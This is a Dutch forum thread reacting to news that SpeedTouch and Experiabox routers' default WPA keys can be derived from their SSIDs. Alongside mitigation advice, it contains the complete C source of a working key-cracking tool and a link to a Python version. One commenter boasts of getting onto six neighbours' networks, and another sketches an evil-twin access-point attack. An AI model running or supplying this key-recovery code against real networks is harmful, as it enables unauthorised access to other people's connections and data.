VETTE shit..

"Ook dit probleem lossen wij snel voor U op beneden de € 60,00 incl.
voorrijden excl. BTW, mits wij U binnen 15 Km vanaf het centrum van 's-
Hertogenbosch kunnen bereiken."

Het zou mijns inziens beter zijn als deze club gewoon de stappen zou laten
zien waarmee gewone gebruikers dit probleem zelf en kostenloos kunnen
oplossen...

Let op: alleen voor Wifi access en alleen indien
eindgebruikers standaard settings niet hebben aangepast
(niet dat dat niet genoeg is, maar de titel van het artikel
is een beetje overtrokken...)

Oplossing is eenvoudig, gewoon netjes zelf wifi opzetten

J.

Dit gaat dus om de Experia boxen en niet om ST780 toestellen
die geleverd worden bij andere providers?

een betere reedmeuk maken voor het instellen van beveiliging.
en het liefst ook voor meerdere OSn

Hmm, doen ze het bij die andere routers toch beter.

Volgens mij is het probleem simpel op te lossen door je SSID
aan te passen, zodat het serienummer niet meer gebroadcast
wordt. En daarnaast natuurlijk NOOIT standaard wachtwoorden
of sleutels gebruiken...

Dit is oud nieuws... is al heel lang bekend...

Je moet gewoon zorgen dat je je SSID en wachtwoord
verandert, dan is er niks aan de hand. De hack werkt alleen
maar als je de standaard instellingen laat staan...

Of de SSID broadcast helemaal uit zetten, ben je er ook.


1. log in op je router (meestal http://10.0.0.138 of
http://192.168.1.254)
2. verander de SSID
3. verander verander je WPA key
4. opslaan
5. klaar

Dit is een voorbeeld van "security through obscurity" die
niet werkt. Je weet het standaard formaat van de SSID. Er is
een beperkt aantal mogelijkheden. Die scan je in een paar
seconden.

Daarnaast zal een (windows) laptop datzelfde SSID uitzenden
als hij geen verbinding kan krijgen met het accesspoint. Je
kunt dan zelfs even net doen alsof je dat accesspoint bent.
Zelfs de key kun je lokaal instellen zodat het er voor de
gebruiker uitziet alsof hij op zijn eigen (beveiligde)
accesspoint zit.

Je kunt het zelfs doen als het accesspoint bestaat. Met een
richtantenne op de laptop gericht zal die liever het
sterkere (valse) signaal gebruiken dan dat van het goede
accesspoint.

Peter

Idd oud : 15 APRIL 2008 :
http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/

Misschien moet er even duidelijk in de kop dat het Wireless
Speedtouch Routers betreft. Dit artikel geeft in ieder geval
aan waarom ik nog steeds geen fiducie in wireless wens te
hebben ;)

wat overdreven dit en de titel is ook overdreven, trekt wel de aandacht :)

Dit toont alleen aan dat nog steeds leveranciers niet de
moeite willen nemen om hun klanten veilige producten te
leveren. Er zijn voldoende manieren om wireless veilig te maken.

In het verleden zijn vergelijkbare fouten gemeld over
standaard username/wachtwoord combinaties van ADSL modems.
Hiermee was het eenvoudig mogelijk om die modems vanaf
internet over te nemen. Toen je dat las was het voor jou ook
duidelijk waarom je geen fiducie in ADSL had?

Peter

bij diezelfde provider, maar ook bij dochter xs4all, is het
modem zodanig ingesteld, als deze niet in bridging mode
staat er een default username/password in staat om het modem
op afstand te manipuleren.

Komkommertijd? Ik heb wel eens met zo'n Experiabox lopen
stoeien, en daar mag je echt niks. Als ik naar mijn eigen ST
doos kijk mag ik als admin veel meer dan de gewone gebruiker.

Leuk is ook dat iedere boerenl*l die toegang heeft tot het
draadloze netwerk ook toegang heeft tot de webinterface. Je
hoeft geen wachtwoord in te voeren. 192.168.1.254 intypen en
je zit in de webinterface.

Zo maak je het wel heel erg gemakkelijk, zeker als je ook
VOIP/SIP hebt via de experiabox. De gebelde en ontvangen
nummers staan vrolijk met datum, tijd en gespreksduur in een
log vermeld.

Ik kan niet vertellen of het Administrator wachtwoord bij
default hetzelfde is (meen mij te herinneren van wel), maar
het tech wachtwoord wordt volgens mij automatisch elke keer
opnieuw gegenereerd als je tech wil laten inloggen (is
zoiets als het "remote helpdesk" account; ik zit op dit
moment niet achter een SpeedTouch).

Helaas zijn er geen gemakkelijke antwoorden op vragen als
“willen we dit soort complexe apparatuur door de gemiddelde
computergebruiker laten inrichten en beheren en zo niet:
door wie dan wel?”, “wat moet er default openstaan naar de
WAN kant”, “wat is voldoende encryptie qua wireless” etc. etc.

Neemt niet weg dat het een (knap gevonden) ongelooflijk
domme ontwerpfout is.

Ik vraag me bij dit soort alarmverhalen altijd weer af: hoeveel zijn er nou echt
door getroffen? Dat hoor je nooit.

Totdat dit bericht verscheen met de link naar het tooltje
zullen er niet zo heel veel slachtoffers zijn. Nu kan iedere
boerenl*l de cracker uithangen..

Ik heb de link naar een kennis gestuurd die ook zo'n
apparaat heeft. Die is goed geschrokken van de snelheid
waarmee de goede key tevoorschijn kwam.

denk ik ook erg moeilijk te achterhalen,
aangezien een hoop mensen geen eens door hebben als er
iemand in hun netwerk zit rond te kijken.

toch vind ik het wel schandalig dat ze zoiets gedaan
hebben, hoezo valse veiligheid...

Dit is heel oud nieuws. Na het verschijnen van het gnu
citizen artikel heb ik uit diverse hoeken al vernomen dat
het in de speedtouch van kpn ook mis zat. Iemand probeert
kennelijk weer geld te slaan uit opschudding (zie reclame
onderaan de pagina van de 'ontdekker'). Welkom bij
security.nl, het nieuwe reclame platform voor de it-security
branche.

Vandaag 6 ssid's getest met speedtouch in de naam. 6 keer
verbinding met het internet via andermans netwerk. Lijkt mij
dus vrij serieus met een score van 100%.

Erg vreemd dat je dit als zakelijke klant uit de pers moet
vernemen.
Gelukkig dat een aantal kenners zonder hier 60 euro voor te
vragen even kan vertellen hoe het dan wel moet.
Mijn tip : deel de kennis, dan komen we allemaal weer een
stukje verder !

Verder lijkt het me een goed idee om een soort KEMA
veiligheids norm, met de mogelijkheid van schade vergoeding.
Dan worde deze partijen wel wat voorzichtiger. KPN is heer
en meester !!

Of simpelweg niet akkoord gaan met het automagisch gedonfigureerd
apparaat.

Er zijn manieren om wireless veiliger
te maken, maar niet veilig in absolute zin. Buiten dat is in
den lande een aandeel gedateerde apparatuur in gebruik, die
bijvoorbeeld nog alleen WEP ondersteunt.

Duh !?

Doe gewoon een beetje moeite een fatsoenlijke ISP te vinden,
die zijn er zat.
Als ik ergens de pest aan heb zijn het zakelijke gebruikers
die een budget-mentaliteit hanteren en dan achteraf zeiken
omdat ze een topproduct 'verwachtten'.....

Het probleem zit niet in de modem maar in de handleiding die
KPN (ook xs4all) bij de modem meegeeft. Daarin staat gewoon
dat je de meegeleverde WPA key in moet vullen. Een gewone
gebruiker zal dit gewoon doen. Ga dit nu nog maar eens
terugdraaien bij al die gebruikers.

Hier is wat simpele python code die je kan gebruiken om te kijken of dit werkt
voor JOUW EIGEN SpeedTouch access point: http://kip.sateh.com/speedtouch.py

ALs je je ssid enkelt veranderd dan ben je al van dit probleem af althans wat
betreft deze tool.

Hoe kan je je ssid veranderen.
1 je opend je browser meestal voor windhoos gebruikers die grote blauwe E
2 je m,aakt de adresbalk leeg en toetst in 10.0.0.138
3 je gaat naar basic dan naar wireless veranderd bij Network name (SSID): de
ssid naar bladiebladiebla en hatsaa ben je hier ook weer van af.

Maar goed dan heb je weer zoeits als Backtrack waar je ook heel simpel weer
wep/wpakey mee vergaart.

Lol en dan laten ze het nog online staan ook die toool !!!!

Een SSID is altijd te hacken ook al heeft de router SSID broadcasting uitstaan
Dit komt omdat je dan alle packetjes doorkijkt die langskomen, daar zit alsnog de SSID in.
dat duurt ongeveer 10 seconden. Het kraken van WEP kan altijd. En WPA / WPA-PSK / WPA2-PSK kan je ook kraken alleen dit duurt langer omdat de router dan een wpa handshake gebruikt die je niet zomaar kan kraken(ze zijn er wel mee bezig). Zo'n WPA-handshake moet je dan kraken met behulp van een dictionary of je doet het bruteforce

Jongens gewoon de ssid naam veranderen dan kan niemand wat dioen !
60 euro om het op te lossen ik lag me dood wat een afzetter zeg

ARV75190A5502

ARV75190A5502

Voor mensen die zich vervelen:
broncode van het programma'tje
zelf ergens sha1.h vandaan googlen


#include <stdio.h>
#include <getopt.h>

#include "sha1.h"

#define SHA1Init SHA1Reset
#define SHA1Update SHA1Input
#define SHA1Final SHA1Result
#define SHA1_CTX SHA1Context

typedef unsigned char u8;
typedef unsigned int u32;


#define SERIAL_LENGTH 12
#define MAX_SSID_OCTETS 6
#define DEFAULT_KEY_SIZE 5

const u8 charTable[]="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const u8 hexTable[]="0123456789ABCDEF";
u8 serial[13]={'C','P','0',0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
#define hexmsb(x)(hexTable[((x & 0xf0) >> 4)])
#define hexlsb(x)(hexTable[ (x & 0x0f)])

void usage(char **argv) {

fprintf(stdout,"\n\tUso: %s [ -i <ssid octets> ] [ -o <output file> ]\n"
"\n\t -i : Los octetos hexadecimales del SSID del router Thomson"
"\n\t -o : Especificar el fichero de salida para las posibles claves"
"\n\t -v : Imprime en pantalla las posibles claves encontradas\n\n",*argv);

exit(0);
}

/*
* convert hexadecimal ssid string to binary
* return 0 on error or binary length of string
*
*/
u32 str2ssid(u8 ssid[],u8 *str) {

u8 *p,*q = ssid;
u32 len = strlen(str);

if( (len % 2) || (len > MAX_SSID_OCTETS) )
return(0);

for(p = str;(*p = toupper(*p)) && (strchr(hexTable,*p)) != 0;) {

if(--len % 2) {
*q = ((u8*)strchr(hexTable,*p++) - hexTable);
*q <<= 4;
}else {
*q++ |= ((u8*)strchr(hexTable,*p++) - hexTable);
}
}
return( (len) ? 0 : (p - str) / 2);
}

/*
* print 5 bytes to output file
*
*/
void dump_key(FILE *out, u8 *key) {

u32 i;
u8 *p = key;

for(i = 0;i < DEFAULT_KEY_SIZE;i++)
fprintf(out,"%.2X",*p++);

fprintf(out,"\n");
}

int main(int argc, char **argv) {

u8 sha1_digest[40]={0};
u8 ssid[8]={0},buf[8]={0},year,week,x1,x2,x3;
u32 keys = 0,ssidLen = 0,verbose = 0, opt = 0;
u8 *p,*q,*strId = NULL;
FILE *ofile = NULL;

SHA1_CTX sha1_ctx;

if(argc > 1) {
while( (opt = getopt(argc, argv,"vo:i:")) != -1) {

switch(opt) {

case 'i' :
strId = optarg;
break;

case 'o' :
if((ofile = fopen(optarg,"wb")) == NULL) {
fprintf(stderr,"\nNo puedo abrir %s para la salida.\n",optarg);
return(0);
}
break;

case 'v' :
verbose++;
break;

default:
usage(argv);
}
}

if(!strId) usage(argv);

if(!(ssidLen = str2ssid(ssid,strId))) usage(argv);

fprintf(stdout,"\nGenerando claves... por favor espera\n\n");

// generate values only for 2005/2007..change if you want.

for(year = 5;year <= 7;year++) {

serial[3] = year | '0';

// 52 weeks of the year

for(week = 1;week <= 52;week++) {

serial[4] = (week / 10) + '0';
serial[5] = (week % 10) + '0';

for(x1 = 0;x1 < 36;x1++) {

serial[6] = hexmsb(charTable[x1]);
serial[7] = hexlsb(charTable[x1]);

for(x2 = 0;x2 < 36;x2++) {

serial[8] = hexmsb(charTable[x2]);
serial[9] = hexlsb(charTable[x2]);

for(x3 = 0;x3 < 36;x3++) {

serial[10] = hexmsb(charTable[x3]);
serial[11] = hexlsb(charTable[x3]);

// hash serial number with sha-1

SHA1Init(&sha1_ctx);
SHA1Update(&sha1_ctx,serial,SERIAL_LENGTH);
SHA1Final(&sha1_ctx,sha1_digest);

// compare SSID octets with last number of bytes supplied

if(memcmp(&sha1_digest[(20-ssidLen)],ssid,ssidLen) == 0) {

keys++;

if(verbose) {

memcpy(buf,serial,6);

fprintf(stdout,
"Número de Serie: %s**%C%C%C - posible clave = ",
buf,charTable[x1],charTable[x2],charTable[x3]);

dump_key(stdout,sha1_digest);
}
if(ofile) {
dump_key(ofile,sha1_digest);
}
}
}
}
}
}
}
fprintf(stdout,"\nResultado: %d posibles claves.\n\n",keys);

if(ofile) fclose(ofile);
}
else {
usage(argv);
}
return(0);
}

Beste Forumgebruikers/reageerders,
Voor de leek die pas 15 jaar met computers werkt en elke dag veel bijleert is het bovenstaande erg interessant.
Zou iemand van u zo vriendelijk willen zijn om exact aan te geven wat ik moet doen voor de KPN Experiabox.
En wat moet ik doen bij de laptop en desktop zelf?
Verder overweeg ik de aanbeveling van het "Chip" computerblad op te volgen om een AVM Fritzbox Fon WLAN 7390 aan te schaffen. Is daar ook een "handleiding voor te maken door een van u?
Verder stond daar iets over de standaard 802.11n die de computers zouden gebruiken. De oude 11g en oude 11n zouden niet goed zijn voor de snelheid, maar hoe kom je er achter waar dat staat?
Kortom veel vragen en wellicht is er een van u die daar tijd voor wil vrij maken.
Alvast hartelijk dank, Chris